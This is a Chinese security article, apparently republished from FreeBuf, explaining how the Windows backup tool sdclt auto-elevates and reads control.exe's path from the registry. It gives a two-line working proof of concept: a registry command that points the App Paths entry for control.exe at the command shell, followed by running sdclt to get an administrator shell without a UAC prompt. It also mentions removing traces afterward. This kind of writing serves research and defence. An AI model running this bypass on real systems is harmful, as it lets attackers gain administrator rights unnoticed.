如何利用sdclt磁盘备份工具绕过UAC

安全 数据安全
本文将详细讲解如何利用sdclt磁盘备份工具绕过UAC。

简介

sdclt 是微软提供的命令行磁盘备份工具,从 Vista 时代引入

从 Vista 时代引入

在 Windows 10 开始,sdclt 加入了自动提升权限的能力,requestedExecutionLevel 由 asInvoker 变为 requireAdministrator

(命令 sigcheck -m %systemroot%\\system32\\sdclt.exe 的结果)

(命令 sigcheck -m %systemroot%\system32\sdclt.exe 的结果)

当不带任何参数启动 sdclt 时,sdclt 会打开控制面板

sdclt 会打开控制面板

控制面板的主程序为 control.exe,那么 sdclt 是如何找到 control.exe 完整路径的呢?

通过 process monitor 的分析 (过滤掉不相干进程,再用 CTRL + F 搜索 control.exe),sdclt 似乎是从注册表读取到了 control.exe 的路径,

按照这个原理,我们写一个简单的 PoC 测试下

  1. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f 
  2. sdclt 

在 cmd 中执行一下试试

在 cmd 中执行一下试试

可以看到,控制面板没有启动,而是弹出了一个 cmd,我们也获得了管理员权限

当然,提升权限后还要清理下痕迹,具体代码请看完整PoC,点这里下载

写在***

其实可以把 HKCU 整个导出来看一下,目前我还没有发现其它类似的案例,有兴趣的同学可以研究下~

责任编辑:赵宁宁 来源: FreeBuf
相关推荐

2015-10-12 11:37:07

2018-11-13 12:56:57

2017-05-05 12:23:25

2018-04-04 14:52:04

2010-11-29 14:05:29

2015-10-30 14:11:47

2017-09-15 08:22:17

磁盘备份设备

2009-10-21 13:39:08

UACWindows 7微软

2017-05-10 07:00:20

磁盘分区dcfldd工具备份分区

2021-08-11 09:32:18

云备份勒索软件网络攻击

2021-05-26 14:36:21

漏洞苹果恶意软件

2011-03-04 14:39:03

MySQL数据库mysqldump

2009-05-12 09:03:30

微软Windows 7操作系统

2023-12-26 12:09:32

2022-05-30 11:21:25

数据库MySQL工具

2016-02-15 10:18:11

2016-03-29 10:08:07

2015-03-06 09:16:55

LUKS加密磁盘备份

2023-03-13 22:23:30

2017-04-17 15:48:15

Cinder备份实践
点赞
收藏

51CTO技术栈公众号